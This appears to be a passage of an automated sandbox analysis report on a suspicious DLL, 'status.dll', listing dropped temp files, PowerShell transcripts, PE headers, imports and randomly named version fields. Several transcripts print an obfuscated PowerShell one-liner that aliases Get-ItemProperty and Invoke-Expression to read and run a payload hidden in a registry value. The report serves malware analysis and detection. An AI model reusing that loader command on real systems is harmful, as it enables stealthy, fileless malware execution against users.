                  SHA-512:A8F9A1E02A285A92E6523470157E8FDEBAD4F13BB9424704AA5C711E78430900E2E30ED78E666DF9471CE3DCB15813C7DF482FB6E51FE6A08E746FAE70F23FAC
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF643103C7B422ACDB.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2953700888949815
                  Encrypted:false
                  SSDEEP:24:i9lRniIf9lL+JK7wu8G9y3U4r0EAKaBplyTX:0iIfz+Wd83Br00SL
                  MD5:E7543D9CC02531BEDD3B8611FBBC8A61
                  SHA1:E326CF04A0A2D419A89EB38AF8C5093E8E38DAB0
                  SHA-256:8892A94AB4643420A60A3A2C89286F64D3BD88ECFB770E48371A43057D39590E
                  SHA-512:781733A5E4546F11F5C1DBF76CB42742B888BB99670E4BD52DA37E494FA93E5D0F0981760267E6DE5A9E569FF21E9E14CB154C4800C6473B444DF03DD894DFA9
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DF7C8DCB96582EFF13.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29650611676210714
                  Encrypted:false
                  SSDEEP:24:i9lRSIf3McPRoiaPwgj5JOIFLony6Xe60h:0SIf3MqoRPZlLqyz60
                  MD5:E36866936DE454828246EACA10EF8D09
                  SHA1:A4B337B112E0E4E8DF31DB24BE240D337C2AC127
                  SHA-256:4EA33E76AF35A8707A5DA28E9B9F18D14E0A734B1FA146B54DB91E9F5A90CEF2
                  SHA-512:208C60492137A9F26F48E8981E1FEFD3825D1EAA0A350AEA15C10ED3A7CB3B2928A56E24146F02EFF2229EF98B451E069642B025BF29AD6E72FAEBCFE15DD3EE
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DFABD2BAAC7D7BDC70.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.1410711960062862
                  Encrypted:false
                  SSDEEP:6:z1/z1/sy1/rG61/c01/ZK6PEzLK8/KHEz:VVDrtcUZK6PQ+8SHQ
                  MD5:B7721FBA8FE8296F1AB62657A738E8B7
                  SHA1:037167C4F2001AA81217D3C143802781A4A14702
                  SHA-256:59785441D00FCAD3A40D46A7498F5BE50A34E755038FFE374E46606C43D65868
                  SHA-512:FE820F5E2CAD282F0C6B175E8482F6B804916FF04033760E976590427E3A862AE6633F0F7D53C9A743CBCB875B01C5106078CF7F3078F61D5B70899A42DBBF7D
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DFB5526166FCAF7E1F.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.29501561334682946
                  Encrypted:false
                  SSDEEP:12:i9l8qatX9UODzSQ3GFzf4lMukQZEMpIXe5W277kO54y0FwZgFCAfYwU9a65/F:i9l8T2OfLZhNt7kO59UwZgFC4fX65
                  MD5:F07D0EB6550247A5530C1072C9394C8D
                  SHA1:119293286A527981C2280260E9C03F9DA82CABD1
                  SHA-256:F72850ACE35DD4890C28298F1546FB7779F6E8183E32A988B50F9C8BE5C6AB44
                  SHA-512:1EB69B1A8DE137AC28B1053D055037ED4585A0EAAAD2121ABFE33C8E0706C558731CB378B0221E3A044AB088EA8E260D47AE76CDC0E934E07EB551F5FF6D3949
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DFBDF8A0AFC4330C88.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.30087301440949077
                  Encrypted:false
                  SSDEEP:12:i9lIqat0vwDzYWSUltKbrD4DevcoLxJiw/QSRQQMQKlCMHV2Tv/F:i9llvwfZfKdxxZQQ20
                  MD5:F95F3E538FA860284861F03D7F18FAD3
                  SHA1:37F54DCD2C9811053B26F7E54828A0033FC10593
                  SHA-256:CD810EAF727A62521536630A53A91F7CF05A0CC5570E655980FE7FA2130D095E
                  SHA-512:F05C1A847A55BB30992BE79FA230935C92A4DF8F4E2F0B492ACE7044FED6517E41BF6206984AF22492413F82EABA1CABF2967EAA32BE1355DA8DA1E8F644931E
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DFC2991413B3C0351D.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.2965237099975743
                  Encrypted:false
                  SSDEEP:12:i9lQatjZIDzzIlINtSklQGmg5AvZhuUSIhMO8cQljgHeJCTK84/F:i9lRZIfzIlDkqGch7SFEwEr+84
                  MD5:5A0A24824F5BEC9F7EC3C5AB1A94A88A
                  SHA1:DA4098131DDAB009E18C43AFDC5E9A4A6A1E42EC
                  SHA-256:C8D0850AB6FF9C2FE733E20FB8A51A33E9B3161DD840C9152B640747FE959350
                  SHA-512:BCDCB45EF563435CDB0CFED6BC08454B59E11E43C3F0B3CB4287533DBB26BC06AC4E1D90F9F3E12968F4776193D12569FBC4685B9424059A2D474B5976392696
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Temp\~DFFE80833AB219EB3E.TMP
                  Process:C:\Program Files\internet explorer\iexplore.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.30415429653347026
                  Encrypted:false
                  SSDEEP:24:i9llHJ8+fA9T2GKATH0GlZlcYJsXmMUHGCr:QHJ3fEl+X0HG
                  MD5:80ECEEABBD4A67A9AD0315D727792F38
                  SHA1:02744D740ECBF9194D60FAD771607EC90756FD2B
                  SHA-256:44F375603BBA5B476CDD422834214021E021774E2E211BAFB282F44A926F18EA
                  SHA-512:9C5582F9C188ECA670C1F1E87AAF43AD245321DD7106633037C83979FEB641F40D59C4EF46E970C79CB235B12E26D01A92F0BA38653A97101B94968FEB9CB971
                  Malicious:false
                  Reputation:unknown
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.J0NW8DwT.20220119115047.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1142
                  Entropy (8bit):5.535457909679894
                  Encrypted:false
                  SSDEEP:24:BxSAZ1xvBn5x2DOXUW1NLCHYn4qW7HjeTKKjX4CIym1ZJXx9NLCHYn4u:BZZHvh5oOV+o4t7qDYB1ZD9+o4u
                  MD5:82FEE9B5CC379504848012D3BDA807D3
                  SHA1:F6A416ECC46600E69F0BAA57724C2C71AE6BE1BB
                  SHA-256:B5A4B7ECCB2E94C2B201F275A7EA01740ABDBDCA6F3A2BEA0BEB5F392471E3E6
                  SHA-512:45E858D68ACBE6EABEBE09739B125C47A01B4E6DFE7C4F7BAC2E216B5675E5589572630B3CCFB1BDDB6AD456BA38938CE963BE38907FF41390DDCA41F2D4CE29
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6944..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115050..**********************..PS>new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([S
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.J0uOBENL.20220119115046.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1347
                  Entropy (8bit):5.364860183350698
                  Encrypted:false
                  SSDEEP:24:BxSAZ1xvBn5x2DOXUW9l0LCHFd4qWH3HjeTKKjX4CIym1ZJXxll0LCHFd4eDnxSa:BZZHvh5oOdlLFd4tXqDYB1ZDllLFd4eV
                  MD5:76CFC3589540417A26342B0A01B51FC0
                  SHA1:8E42A82771D0F30EC1C2B20DA142F351937101C1
                  SHA-256:9385F1106060721CA9714F1BC4D7E58925E67B7AE43F8054E3C6CF00E5C675F1
                  SHA-512:2B440373E7D911E6635DDF4CCC52F597FBDD410B0F154E1433C9C3B7611DE47DE74C99616D97B8E6DE90969283871FD9F69252FBA141BA95B1578EA76D63B066
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115050..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 5008..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115050..**********************..PS>new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Te
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.MVq65tiG.20220119115053.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1359
                  Entropy (8bit):5.393462741800469
                  Encrypted:false
                  SSDEEP:24:BxSAcyxvBn5x2DOXUW9DLCHq4qW8HjeTKKjX4CIym1ZJXPDLCHq4NmnxSAZVC:BZxvh5oOdwq4t8qDYB1Z9wq4NoZZVC
                  MD5:2FADDE21AC915A4A9759332593B5894B
                  SHA1:7BA553DA8746F9F393FF30BDF945C57B1EBBAA3F
                  SHA-256:7B8F167EADA6230CE4B868460DDB8D11D67B9D8E88352C92125A5BE2EADA8AD0
                  SHA-512:7838CA982E20AD89302DC4557324C8C51B70414A4D84EE3CB75FCD945814FB0664867E79E49EF1E439735FDB591DF8C03ADBCFBF3EADC91CBFD23B3A2B686B32
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115054..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 2176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115054..**********************..PS>new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([
                  C:\Users\user\Documents\20220119\PowerShell_transcript.287400.mbM60WFd.20220119115055.txt
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1359
                  Entropy (8bit):5.396727230652096
                  Encrypted:false
                  SSDEEP:24:BxSATxvBn5x2DOXUW9DLCHq4qWXyHjeTKKjX4CIym1ZJXbDLCHq4zmnxSAZ7C:BZ9vh5oOdwq4tiqDYB1ZRwq4zoZZ7C
                  MD5:E60A686C505972D9DAFA1A0DDE8FE4F7
                  SHA1:775B8DA2955812411BA7F7CC50A398F884A16069
                  SHA-256:DAF983279AD5906392E498368FA8996BE6786465598E843CCBBA5DC6E0F6E448
                  SHA-512:D974119A5FA839A0220A883EECA4B0D3BA73D62BCA4B8E8A92D5541666849D27CEA956596BB45540466D5760413F3A88FCB82295021DF00A35527AA9D8B12A42
                  Malicious:false
                  Reputation:unknown
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20220119115058..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 287400 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 1676..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220119115058..**********************..PS>new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([

                  Static File Info

                  General

                  File type:MS-DOS executable, MZ for MS-DOS
                  Entropy (8bit):5.793442977835089
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • VXD Driver (31/22) 0.00%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:status.dll
                  File size:1235456
                  MD5:947fe47db34a2654fc7aa76ec2bebec0
                  SHA1:6e2d76945861c48a2e4552d87583c1a70e6525a2
                  SHA256:02bb7e5eda106943c37400103a651d11d1ebfd5f4b0a550874328c2c82340923
                  SHA512:da59273a5782006b2b13012b012db2ddb59441cc7ea3735b355605a29460029f990ec3e25232ab9dc27cf8dad1e27ed4742e4bba1541ca65958d608e38dc6237
                  SSDEEP:24576:a04Q1k7lRM3FymFIz5yfd/N04Q1k7lRM3FymFIz5yfd/N04Q1k7lRM3FymFIz5yE:fXu/MV/INrXu/MV/INrXu/MV/INN9Vz
                  File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........................@...............................@.......|..................................U..

                  File Icon

                  Icon Hash:74f0e4ecccdce0e4

                  Static PE Info

                  General

                  Entrypoint:0x100017f4
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                  DLL Characteristics:
                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7790023abe9e706b7ca9941ca04b698c

                  Entrypoint Preview

                  Instruction
                  mov ecx, 00001935h
                  push 00000000h
                  call dword ptr [10004C08h]
                  mov ecx, eax
                  mov ebx, eax
                  push 10001887h
                  ret
                  lea ecx, dword ptr [ecx+00h]
                  push eax
                  mov esi, dword ptr [ebp+000002ACh]
                  push esi
                  mov eax, dword ptr [10028634h]
                  mov dword ptr [10028B2Ch], 100141B8h
                  call dword ptr [10021024h]
                  mov bl, byte ptr [esp+0Ch]
                  jc 00007F19CC6DD596h
                  and ecx, 81010100h
                  cmp edi, esi
                  pop ebx
                  call 00007F19CC6E2D03h
                  ret
                  pop ebx
                  add esi, 01h
                  xor cl, bl
                  push 00000000h
                  fld qword ptr [eax]
                  pop ebp
                  mov al, byte ptr [esi]
                  jc 00007F19CC6DD596h
                  pop esi
                  add ecx, 01h
                  add ecx, 01h
                  push ebp
                  push eax
                  jc 00007F19CC6DD596h
                  cmp ecx, 08h
                  add dword ptr [eax+468A0147h], ecx
                  jne 00007F19CC6DD596h
                  call dword ptr [10021024h]
                  push eax
                  mov eax, ecx
                  jc 00007F19CC6DD596h
                  push ebp
                  mov ebp, esp
                  add esp, FFFFFFF8h
                  push esi
                  call dword ptr [10004C44h]
                  mov dword ptr [ebp-08h], eax
                  push 10125BEFh
                  call dword ptr [10004DBCh]
                  mov dword ptr [10125C64h], eax
                  push 0000002Bh
                  push eax
                  push dword ptr [10125C38h]
                  push 0000002Ah
                  push dword ptr [10125C58h]
                  push 00000068h

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x2eda0x55.text
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4dcc0xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x12b0000x746c.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1330000x3c8.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x4b500x27c.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x2def0x2e00False0.634510869565data6.95280203957IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rdata0x40000xe800x1000False0.412841796875data4.43323834069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x50000x1255b00x121200False0.707899305556data5.68912538804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x12b0000x746c0x7600False0.307997881356data3.20109729995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1330000x3c80x400False0.8603515625data6.36587006793IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x12b0580x7414dataEnglishUnited States

                  Imports

                  DLLImport
                  advapi32.dllRegSetValueExW, LookupAccountSidW, GetKernelObjectSecurity, LookupAccountNameW, RegOpenKeyW, RegDeleteKeyW, GetLengthSid, OpenServiceW, RegOpenKeyExW, AdjustTokenPrivileges, CreateServiceW, DeleteService, CloseServiceHandle, SetServiceStatus, RegCloseKey, OpenSCManagerW, IsValidSid, RegCreateKeyW, OpenThreadToken, DuplicateTokenEx, RegQueryValueExW, SetThreadToken, GetTokenInformation, StartServiceCtrlDispatcherW, OpenProcessToken, RegisterServiceCtrlHandlerExW, LookupPrivilegeValueW
                  dbghelp.dllMiniDumpWriteDump
                  kernel32.dllVerifyVersionInfoW, HeapDestroy, DeleteCriticalSection, FormatMessageW, SetConsoleScreenBufferSize, SetEvent, FreeConsole, GetCurrentThread, UnhandledExceptionFilter, QueryPerformanceFrequency, GetStringTypeExA, GetCurrentProcessId, DuplicateHandle, VirtualProtectEx, LoadLibraryA, SetUnhandledExceptionFilter, GetModuleHandleA, InterlockedIncrement, CreateEventW, GetProcAddress, LoadLibraryW, DeviceIoControl, AllocConsole, InterlockedExchange, DeleteFileW, LocalFree, WriteFile, lstrlenW, InterlockedDecrement, GetComputerNameA, RaiseException, GetCommandLineW, GetModuleFileNameA, IsProcessorFeaturePresent, CreateFileW, TerminateProcess, HeapFree, WideCharToMultiByte, GetModuleHandleW, HeapCreate, DebugBreak, GetLastError, GetTickCount, WaitForSingleObject, GetProcessHeap, SetConsoleMode, ReadConsoleInputW, FreeLibrary, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetTempPathW, CreateThread, CloseHandle, LeaveCriticalSection, GetNumberOfConsoleInputEvents, HeapAlloc, CreateFileA, InterlockedExchangeAdd, SetFilePointer, GetVersionExW, Sleep, OutputDebugStringW, ResumeThread, InitializeCriticalSection, GetCurrentProcess, QueryPerformanceCounter, LCMapStringW, IsDebuggerPresent, HeapReAlloc, VerSetConditionMask, LoadLibraryExW, EnterCriticalSection, GetStdHandle, SetLastError, LocalAlloc, GetCurrentThreadId
                  msvcrt.dll_vsnwprintf, _onexit, _purecall, wcslen, free, atol, strchr, ?terminate@@YAXXZ, memmove, _initterm, wcscmp, iswspace, _CxxThrowException, wcschr, _beginthreadex, _ultow, sscanf, _vsnprintf, malloc, __CxxFrameHandler, __dllonexit, wcsncpy
                  ntdsapi.dllDsCrackSpnW
                  ole32.dllCoQueryProxyBlanket, CoUnmarshalInterface, CoSetProxyBlanket, CoGetClassObject, CoCreateGuid, CoGetCallContext, CoTaskMemAlloc, CoInitializeEx, CoGetMarshalSizeMax, CoImpersonateClient, StringFromGUID2, CoSwitchCallContext, CoInitialize, CoCreateInstance, CoTaskMemFree, CoMarshalInterThreadInterfaceInStream, CoTaskMemRealloc, CoMarshalInterface, CoGetInterfaceAndReleaseStream, CoUninitialize, CoRevertToSelf, CLSIDFromString
                  shlwapi.dllPathIsRelativeA
                  user32.dllGetSystemMetrics

                  Exports

                  NameOrdinalAddress
                  DllRegisterServer10x100012b4

                  Version Infos

                  DescriptionData
                  NonpigmentedImmaterials
                  SuprapubicCellose
                  PhenylamideCaudofemoral
                  MistrainUncorruptly
                  UnoverflowingStreltzi
                  RatihabitionWishedly
                  ImmeasurabilityTelautomatics
                  ReadablenessPlaceless
                  TransmogrificationChimaeroid
                  ProtephemeroideaIndelicateness
                  SmashupDuctileness
                  AulophyteVannet
                  InternalNameStonyheartedness
                  RelowerAnabasse
                  SuperagrarianZingiberaceae
                  NurturerDiscomfortingly
                  MythosAntecedence
                  AlveolaryBoothite
                  BiodynamicalUnbeauteous
                  HarebrainednessImputrescible
                  TerroristicalFormicarian
                  OrgiacAcranial
                  IdeomotorMbuba
                  EndomycesRewend
                  InciterEpiclastic
                  UncrookingProcharity
                  InvigilationUndrossy
                  HarmotomicPyrolignous
                  DungannoniteCleanish
                  ImmaterialsTawpie
                  HypertrophiedTriturium
                  ReiterativeStraphanger
                  NonperformingGravure
                  ClombenProtococcus
                  PlatformyTylopoda
                  PeriphericallyWildwood
                  RhacianectesCathetometric
                  EuchredPlaintless
                  RumalOuterly
                  CountervoteDelomorphous
                  PostarticularUntownlike
                  HumbuggerForeremembered
                  PhotocatalyzerBrachiofacial
                  ConciliatorHipple
                  FiltermanNievling
                  OrtFuriousness
                  OligoniteEccentrate
                  PerpetuationCheltenham
                  VisceripericardialOtherhow
                  AntitetanolysinSugarlike
                  PushballMacrocentrus
                  HyenanchinProtoreptilian
                  PseudofinalAdnomination
                  SuggesterMisdirect
                  MonoacetateAhousaht
                  RauliMetastannate
                  TrituriumPieprint
                  UnstatuesqueRefreshing
                  UromastixStructured
                  UnstraightEccentrate
                  PuruloidGyrostat
                  MachinizeParametrium
                  FolkrightTherewithin
                  PinderMountaintop
                  DisfranchiserCarabeen
                  UpgaleBatrachospermum
                  GainstMisinterment
                  DwarfishnessBespecklement
                  DogateLudicrosplenetic
                  DepositureTriatoma
                  PeasecodOutvelvet
                  TubbeckRumenotomy
                  JogglyTriazane
                  CopartnershipTraducingly
                  PreternaturalismCharacterlessness
                  KilovarWhistlingly
                  SubcircuitChampagneless
                  ChinampaEudaemonistical
                  FamiliaSacrocoxitis
                  OssuaryPowhatan
                  KailLogogram
                  PhasmatoideaSaliniform
                  ThereanentUncurtailed
                  DisconcordJonathanization
                  EthylateShirlcock
                  LuntReoxygenate
                  PeartenAdelbert
                  OlecranianTutiorism
                  SuperregenerationDisfranchiser
                  IntertragianWolfdom
                  SpeissHeterogenous
                  WinterlikeRumal
                  PlucklessSirenia
                  SophomoricalCanful
                  MyxobacteriaHypomanic
                  BablohMagism
                  SubnucleusBlockmaker
                  PegaseanChronosemic
                  FileDescriptionEpilogical
                  NonintuitiveHydrocyst
                  FragariaOstariophysial
                  QuibbleproofScryer
                  SelffulnessUnchoral
                  CrookbackIntracanalicular
                  ConsiderableBonce
                  EnhuskPlatysomid
                  NonselectiveNonconsenting
                  SpiculoseOccurrence
                  FileVersion5, 3, 2, 3
                  PhrymaceaePelviperitonitis
                  ShadedHoarder
                  LevierPolymythic
                  EurypharyngidaePraestomium
                  UnsociableMatriculable
                  RougyMineralogical
                  TophaceousVassalship
                  ReidentificationRukbat
                  EncephaloscopePredacity
                  IntermingleUncomfortable
                  TribeshipWiseman
                  BirdhousePhos
                  UndetrimentalChlorimetric
                  MaskerCoadventure
                  NanismMicrospermae
                  EquivoteRhapsode
                  AmyelonicStylize
                  HyponoiaZabra
                  ViduationMugilidae
                  SubplinthWightness
                  MetapsychologicalAthrong
                  AnabaptisticPolyprene
                  PolymathyCerumen
                  AntisoporificHereamong
                  SurvivanceChilognathan
                  HaskApodeipnon
                  HornotineRhabdomonas
                  EvanEkron
                  StagiaryTampan
                  MacrotherioidScribatious
                  BryozoumTabellion
                  CryoliteOrchichorea
                  PonderomotiveSprose
                  CorruptednessUnignitable
                  WhimsiedPlatymeric
                  DesultoriousRatchelly
                  TheocollectivismBlepharospasm
                  PunilyLaterotemporal
                  RahMononychous
                  CarditicPostmeridian
                  FiddleheadedEncephaloscope
                  SpoffleIntersexual
                  UnsoftenedIndophenol
                  QuadrisyllabicalResolder
                  WagandaSpaewife
                  PleurocapsaPeracute
                  GarawiHomopathy
                  DantistFusarial
                  SeminovelRidiculousness
                  HyperparasitismDecipium
                  PrefecundationPelopaeus
                  AntipatriarchalLygosoma
                  MoonlikeDemagnetize
                  KaolinateEurypharynx
                  EctodermicBaselessness
                  BrockedShortsome
                  CantaliteLadylikeness
                  AcateAlchemistical
                  SeepweedShallowly
                  MincingFenlander
                  SigilativeUnfilially
                  OrganerEthicism
                  AllocutiveSemisaltire
                  PersecutorLoxia
                  HistrionicsSubstitutional
                  MyelosyringosisDiapensia
                  MusterCointersecting
                  StrudelConcessively
                  UnversedErotopath
                  ValerinOvergrossness
                  LateralisPlatyfish
                  SireniaBretwaldaship
                  DissentinglySemimanufacture
                  OverlivelyCampulitropal
                  KnavishnessBryological
                  StereotaxisLegless
                  UnframedMyrrhine
                  CamelidaeRetrorsely
                  AutomobilisticCountersense
                  MicrurgicPurely
                  AleuriticFolletage
                  ForeheadImpeevish
                  UndancingTinware
                  VapocauterizationBoregat
                  PozzuolanicEczematization
                  CorybantishMountaintop
                  EnchantmentDisenchantress
                  ArcheocytePuromucous
                  BiblismQuiinaceae
                  ArteriorrhagiaGondite
                  DuctilenessItchy
                  EntenteRefinement
                  AstronomizeMoriform
                  AswellDedicator
                  ReceiptsSatellitium
                  AdiabaticallyUngelt
                  TriorZabra
                  LeucophyllousLihyanite
                  TucunaActinotrichium
                  AmnesticSemiahmoo
                  MesalikeGoujon
                  PorphyroblasticDietics
                  WheeldomZoanthacea
                  UltravirtuousYounghearted
                  MortifiednessSeemless
                  OvercarryAlectoropodous
                  PlanetingAbie
                  AmyotrophiaObloquial
                  RuefulnessGyrostat
